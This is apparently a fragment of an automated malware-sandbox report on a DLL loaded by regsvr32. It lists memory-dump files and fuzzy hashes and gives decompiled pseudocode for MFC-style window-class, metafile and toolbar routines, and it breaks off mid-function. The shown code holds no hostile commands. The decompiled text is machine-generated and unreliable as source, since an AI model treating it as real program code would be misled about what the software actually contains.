Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: 103160473dbaae82e234cb7b2b70863994f8aa932a9e54a4c368de6c924aeab4
Instruction ID: 5bad117b63ae69d34a77b33c97ab1783ec9515d92cd89bc3fc530cee35543a1f
Opcode Fuzzy Hash: 103160473dbaae82e234cb7b2b70863994f8aa932a9e54a4c368de6c924aeab4
Instruction Fuzzy Hash: 11B1F3B5900209AFDB04EFA8C984AED7BF4FF08354F11812AFD199B251E774E994CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100172B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E100172B0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1001E302(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E10049170(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1001E302(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x100bdcb8; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = L10016FC9(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = L10016FC9(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = L10016FC9(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E1001726F(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E1001726F(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | L1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | L1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | L1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | L1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | L1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | L1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | L1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | L1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | L1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | L1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | L1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | L1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | L1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | L1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

0x100172b0
0x100172b6
0x100172bb
0x100172c3
0x100172c3
0x100172c6
0x00000000
0x100172ca
0x100172d0
0x100172d1
0x100172d2
0x100172dc
0x100172de
0x100172eb
0x100172ee
0x100172f3
0x100172fc
0x100172ff
0x10017304
0x10017305
0x10017308
0x1001730b
0x10017310
0x10017311
0x10017318
0x1001731f
0x10017324
0x10017326
0x10017328
0x10017328
0x10017328
0x10017326
0x10017329
0x1001732d
0x1001732f
0x10017339
0x1001733a
0x10017341
0x10017346
0x10017348
0x1001734a
0x1001734a
0x1001734a
0x10017348
0x1001734d
0x10017351
0x10017356
0x10017357
0x1001735a
0x10017361
0x10017368
0x1001736d
0x1001736f
0x10017371
0x10017371
0x10017371
0x1001736f
0x10017374
0x10017378
0x10017388
0x1001738b
0x1001738e
0x10017393
0x10017395
0x10017397
0x10017397
0x10017397
0x10017395
0x1001739a
0x1001739d
0x100173ad
0x100173b4
0x100173bb
0x100173c0
0x100173c2
0x100173c4
0x100173c4
0x100173c4
0x100173c2
0x100173c6
0x100173ca
0x100173d5
0x100173e1
0x100173e3
0x100173e3
0x100173e3
0x100173e3
0x100173ea
0x100173ee
0x100173f6
0x10017402
0x10017402
0x10017402
0x10017404
0x10017408
0x10017413
0x1001741f
0x1001741f
0x1001741f
0x10017426
0x10017429
0x10017430
0x10017438
0x10017438
0x10017438
0x1001743f
0x10017442
0x10017449
0x10017455
0x10017455
0x10017455
0x1001745c
0x1001745f
0x10017466
0x10017472
0x10017472
0x10017472
0x10017479
0x1001747c
0x10017483
0x1001748f
0x1001748f
0x1001748f
0x10017496
0x10017499
0x100174a0
0x100174ac
0x100174ac
0x100174ac
0x100174b3
0x100174b6
0x100174bd
0x100174c9
0x100174c9
0x100174c9
0x100174d0
0x100174d3
0x100174da
0x100174e2
0x100174e2
0x100174e2
0x100174e9
0x100174ec
0x100174f3
0x100174fb
0x100174fb
0x100174fb
0x10017502
0x10017505
0x1001750c
0x10017518
0x10017518
0x10017518
0x1001751f
0x10017522
0x10017529
0x10017535
0x10017535
0x10017535
0x1001753c
0x1001753f
0x10017546
0x1001754e
0x1001754e
0x1001754e
0x10017550
0x10017553
0x10017556
0x10017562
0x10017564
0x10017569
0x1001756c
0x1001756c
0x1001756c
0x1001757b
0x1001757d
0x1001757d
0x00000000

APIs

_memset.LIBCMT ref: 100172DE

Strings

AfxMDIFrame80s, xrefs: 1001737F
@, xrefs: 10017483
@, xrefs: 100173EA
AfxControlBar80s, xrefs: 1001735A
AfxFrameOrView80s, xrefs: 100173A4

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxControlBar80s$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-872377046
Opcode ID: 246c2736f34b9221e7c0ea197a0b0a73a0b258aac16dd4f6392efafb935adb0d
Instruction ID: da3380c3b0667d0e64b503f302b748ed86f8a6d1f09ab35432b847b42ad21fda
Opcode Fuzzy Hash: 246c2736f34b9221e7c0ea197a0b0a73a0b258aac16dd4f6392efafb935adb0d
Instruction Fuzzy Hash: 34812075C00219AADB40CFA4C585BEEBFF8EF04384F118165F919EA191EB74DB85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000D1E8 Relevance: 10.7, APIs: 7, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000D1E8(struct HDC__* _a4, struct tagHANDLETABLE* _a8, void* _a12, int _a16, void* _a20) {
				void* _v8;
				void* _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t105;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t117;
				void* _t118;
				signed int _t119;
				long _t120;
				long _t122;
				long _t124;
				long _t126;
				long _t128;
				void* _t134;
				void* _t136;
				void* _t138;
				void* _t140;
				void* _t144;
				void _t172;
				void* _t173;
				struct tagMETARECORD* _t175;
				void* _t176;

				_t175 = _a12;
				_t119 = _t175->rdFunction & 0x0000ffff;
				_t176 = _t119 - 0x20b;
				if(_t176 > 0) {
					_t120 = _t119 - 0x20c;
					__eflags = _t120;
					if(_t120 == 0) {
						 *((intOrPtr*)( *_a20 + 0x48))( &_v68,  *((short*)(_t175 + 8)), _t175->rdParm);
					} else {
						_t122 = _t120 - 1;
						__eflags = _t122;
						if(_t122 == 0) {
							 *((intOrPtr*)( *_a20 + 0x38))( &_v60,  *((short*)(_t175 + 8)), _t175->rdParm);
						} else {
							_t124 = _t122 - 1;
							__eflags = _t124;
							if(_t124 == 0) {
								 *((intOrPtr*)( *_a20 + 0x40))( &_v52,  *((short*)(_t175 + 8)), _t175->rdParm);
							} else {
								_t126 = _t124 - 3;
								__eflags = _t126;
								if(_t126 == 0) {
									 *((intOrPtr*)( *_a20 + 0x3c))( &_v44,  *((short*)(_t175 + 8)), _t175->rdParm);
								} else {
									_t128 = _t126 - 0x1ff;
									__eflags = _t128;
									if(_t128 == 0) {
										 *((intOrPtr*)( *_a20 + 0x4c))( &_v36,  *((short*)(_t175 + 0xc)),  *((short*)(_t175 + 0xa)),  *((short*)(_t175 + 8)), _t175->rdParm);
									} else {
										__eflags = _t128 == 0;
										if(_t128 == 0) {
											 *((intOrPtr*)( *_a20 + 0x44))( &_v28,  *((short*)(_t175 + 0xc)),  *((short*)(_t175 + 0xa)),  *((short*)(_t175 + 8)), _t175->rdParm);
										} else {
											goto L27;
										}
									}
								}
							}
						}
					}
				} else {
					if(_t176 == 0) {
						L1000C778(_a20,  &_v20,  *((short*)(_t175 + 8)), _t175->rdParm);
					} else {
						_t134 = _t119 - 0x1e;
						if(_t134 == 0) {
							 *((intOrPtr*)( *_a20 + 0x1c))();
						} else {
							_t136 = _t134 - 0xe5;
							if(_t136 == 0) {
								 *((intOrPtr*)( *_a20 + 0x34))(_t175->rdParm);
							} else {
								_t138 = _t136 - 0x24;
								if(_t138 == 0) {
									 *((intOrPtr*)( *_a20 + 0x20))(_t175->rdParm);
								} else {
									_t140 = _t138 - 6;
									if(_t140 == 0) {
										_t141 = _a8;
										_t173 = _a8[_t175->rdParm & 0x0000ffff];
										_a12 = _t173;
										_t105 = GetObjectType(_t173);
										__eflags = _t105;
										if(_t105 != 0) {
											__eflags = _t105 - 6;
											if(__eflags != 0) {
												goto L27;
											} else {
												_push(_t173);
												_t106 = L1000CF95(_t117, _t141, _t173, _t175, __eflags);
												_t172 =  *_a20;
												goto L13;
											}
										} else {
											_t108 = GetStockObject(0xd);
											_t118 = _a20;
											_v8 = _t108;
											_a20 = SelectObject( *(_t118 + 4), _t108);
											_t110 = SelectObject( *(_t118 + 4), _a12);
											__eflags = _t110 - _v8;
											_v12 = _t110;
											if(__eflags != 0) {
												SelectObject( *(_t118 + 4), _a20);
												SelectObject( *(_t118 + 4), _v12);
												goto L27;
											} else {
												_push(_a12);
												_t106 = L1000CF95(_t118, _t141, SelectObject, _t175, __eflags);
												_t172 =  *_t118;
												L13:
												 *((intOrPtr*)(_t172 + 0x28))(_t106);
											}
										}
									} else {
										_t144 = _t140 - 0xd4;
										if(_t144 == 0) {
											 *((intOrPtr*)( *_a20 + 0x2c))(_t175->rdParm);
										} else {
											if(_t144 != 8) {
												L27:
												PlayMetaFileRecord(_a4, _a8, _t175, _a16);
											} else {
												 *((intOrPtr*)( *_a20 + 0x30))(_t175->rdParm);
											}
										}
									}
								}
							}
						}
					}
				}
				return 1;
			}

0x1000d1f0
0x1000d1f3
0x1000d1fc
0x1000d1ff
0x1000d330
0x1000d330
0x1000d336
0x1000d412
0x1000d33c
0x1000d33c
0x1000d33c
0x1000d33d
0x1000d3fa
0x1000d343
0x1000d343
0x1000d343
0x1000d344
0x1000d3e2
0x1000d34a
0x1000d34a
0x1000d34a
0x1000d34d
0x1000d3ca
0x1000d34f
0x1000d34f
0x1000d34f
0x1000d355
0x1000d3b2
0x1000d357
0x1000d358
0x1000d359
0x1000d38d
0x00000000
0x00000000
0x00000000
0x1000d359
0x1000d355
0x1000d34d
0x1000d344
0x1000d33d
0x1000d205
0x1000d205
0x1000d326
0x1000d20b
0x1000d20b
0x1000d20e
0x1000d30d
0x1000d214
0x1000d214
0x1000d21a
0x1000d300
0x1000d220
0x1000d220
0x1000d223
0x1000d2ee
0x1000d229
0x1000d229
0x1000d22c
0x1000d263
0x1000d266
0x1000d26a
0x1000d26d
0x1000d273
0x1000d275
0x1000d2ce
0x1000d2d1
0x00000000
0x1000d2d7
0x1000d2d7
0x1000d2d8
0x1000d2e0
0x00000000
0x1000d2e0
0x1000d277
0x1000d279
0x1000d27f
0x1000d28c
0x1000d294
0x1000d29a
0x1000d29c
0x1000d29f
0x1000d2a2
0x1000d2bf
0x1000d2c7
0x00000000
0x1000d2a4
0x1000d2a4
0x1000d2a7
0x1000d2ac
0x1000d2b0
0x1000d2b1
0x1000d2b1
0x1000d2a2
0x1000d22e
0x1000d22e
0x1000d234
0x1000d257
0x1000d236
0x1000d239
0x1000d35b
0x1000d365
0x1000d23f
0x1000d247
0x1000d247
0x1000d239
0x1000d234
0x1000d22c
0x1000d223
0x1000d21a
0x1000d20e
0x1000d205
0x1000d41c

APIs

GetObjectType.GDI32 ref: 1000D26D
GetStockObject.GDI32(0000000D), ref: 1000D279
SelectObject.GDI32(?,00000000), ref: 1000D28F
SelectObject.GDI32(?,?), ref: 1000D29A
PlayMetaFileRecord.GDI32(?,?,?,?), ref: 1000D365

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Select$FileMetaPlayRecordStockType
String ID:
API String ID: 4008327421-0
Opcode ID: f562a23c37564a38b1fc0ebd0acd21fa1261cdd2b465d0324882b9d721ffca98
Instruction ID: a374fe531f4533bf9e2ac478e20ab67a5c21d16fab6e8d4b8b067a8713c70d93
Opcode Fuzzy Hash: f562a23c37564a38b1fc0ebd0acd21fa1261cdd2b465d0324882b9d721ffca98
Instruction Fuzzy Hash: 34714A79504A15DBDB14EFA4C884CBFBBF5FF88781B10845EF9124A628D734E980DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1003FC56 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1003FC56(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				struct tagRECT _v20;
				struct tagRECT _v36;
				struct HWND__* _v84;
				unsigned int _v108;
				intOrPtr _v112;
				char _v116;
				void* __edi;
				void* __esi;
				intOrPtr _t51;
				intOrPtr* _t53;
				intOrPtr* _t69;
				signed int _t72;
				void* _t74;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t95;
				void* _t100;
				intOrPtr* _t102;

				_push(0);
				_t102 = __ecx;
				_push(0);
				_push(0x40c);
				_t74 =  *((intOrPtr*)( *__ecx + 0x110))();
				_t104 = _t74;
				_v116 = 0x50;
				_t100 = _t74;
				if(_t74 == 0) {
					L7:
					SetRectEmpty( &_v20);
					while(_t74 != 0) {
						_t74 = _t74 - 1;
						_v112 = 1;
						 *((intOrPtr*)( *_t102 + 0x110))(0x41d, _t74,  &_v116);
						__eflags = _v108 & 0x00000008;
						if((_v108 & 0x00000008) == 0) {
							 *((intOrPtr*)( *_t102 + 0x110))(0x409, _t74,  &_v36);
							UnionRect( &_v20,  &_v20,  &_v36);
						}
					}
					if(IsRectEmpty( &_v20) != 0) {
						_t51 = _v20.bottom;
						_t78 = _v20.right;
					} else {
						SetRectEmpty( &_v36);
						 *((intOrPtr*)( *_t102 + 0x140))( &_v36, _a12);
						_t78 = _v20.right + _v36.left - _v36.right;
						_t51 = _v20.bottom + _v36.top - _v36.bottom;
					}
					if(_a12 != 0 || _a8 == 0) {
						__eflags = _a12;
						_t95 = _t51 - _v20.top;
						if(_a12 == 0) {
							goto L17;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L17;
						}
						_t79 = 0x7fff;
						goto L18;
					} else {
						_t95 = 0x7fff;
						L17:
						_t79 = _t78 - _v20.left;
						L18:
						_t53 = _a4;
						 *_t53 = _t79;
						 *((intOrPtr*)(_t53 + 4)) = _t95;
						return _t53;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					_t100 = _t100 - 1;
					_v112 = 0x11;
					 *((intOrPtr*)( *_t102 + 0x110))(0x41d, _t100,  &_v116);
					_t69 = E100203C2(0x1009e47c, E10014011(_t102, _t100, _t102, _t104, _v84));
					if(_t69 == 0) {
						_t72 = GetWindowLongA(_v84, 0xfffffff0) >> 0x0000001c & 0x00000001;
						__eflags = _t72;
					} else {
						_t72 =  *((intOrPtr*)( *_t69 + 0x154))();
					}
					if(_t72 != ( !(_v108 >> 3) & 0x00000001)) {
						 *((intOrPtr*)( *_t102 + 0x110))(0x423, _t100, _t72);
					}
				} while (_t100 != 0);
				goto L7;
			}

0x1003fc5f
0x1003fc61
0x1003fc65
0x1003fc67
0x1003fc72
0x1003fc74
0x1003fc76
0x1003fc7d
0x1003fc7f
0x1003fcf7
0x1003fd01
0x1003fd4a
0x1003fd0b
0x1003fd14
0x1003fd1b
0x1003fd21
0x1003fd25
0x1003fd35
0x1003fd44
0x1003fd44
0x1003fd25
0x1003fd5a
0x1003fd8b
0x1003fd8e
0x1003fd5c
0x1003fd60
0x1003fd6d
0x1003fd82
0x1003fd87
0x1003fd87
0x1003fd96
0x1003fdb7
0x1003fdba
0x1003fdbc
0x00000000
0x00000000
0x1003fdbe
0x1003fdc1
0x00000000
0x00000000
0x1003fdc3
0x00000000
0x1003fd9d
0x1003fd9d
0x1003fda2
0x1003fda2
0x1003fda5
0x1003fda5
0x1003fdaa
0x1003fdac
0x1003fdb1
0x1003fdb1
0x00000000
0x00000000
0x00000000
0x1003fc81
0x1003fc81
0x1003fc87
0x1003fc90
0x1003fc97
0x1003fcab
0x1003fcb4
0x1003fcd0
0x1003fcd0
0x1003fcb6
0x1003fcba
0x1003fcba
0x1003fce0
0x1003fced
0x1003fced
0x1003fcf3
0x00000000

APIs

GetWindowLongA.USER32(?,000000F0), ref: 1003FCC7
SetRectEmpty.USER32(?), ref: 1003FD01
UnionRect.USER32(?,?,?), ref: 1003FD44
IsRectEmpty.USER32 ref: 1003FD52
SetRectEmpty.USER32(?), ref: 1003FD60

Strings

P, xrefs: 1003FC76

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Empty$LongUnionWindow
String ID: P
API String ID: 1811082079-3110715001
Opcode ID: 6b72cd354d9265c7ba935c05ee196e7bacef4bb1858a8396bb49631afc64948d
Instruction ID: d1836f5a0f382b97b9cbd91a64c48767d3f03db10e2d9acb5cf6244ea132254a
Opcode Fuzzy Hash: 6b72cd354d9265c7ba935c05ee196e7bacef4bb1858a8396bb49631afc64948d
Instruction Fuzzy Hash: 3E415971A0021AAFDB15CFA5C888EFEB7B9FF48705F15452DE955AB280CB749940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002F23F Relevance: 10.6, APIs: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E1002F23F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E1004764D(0x100904c6, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E1001E397(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E1001D714();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E10047725(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x100a4a1c, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E10049170(_t97, _t101 - 0x48, 0, 0x20);
						E10049170(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x100a47bc, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E1000A069(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				L1002C9FF(_t97, _t101 - 0x6c);
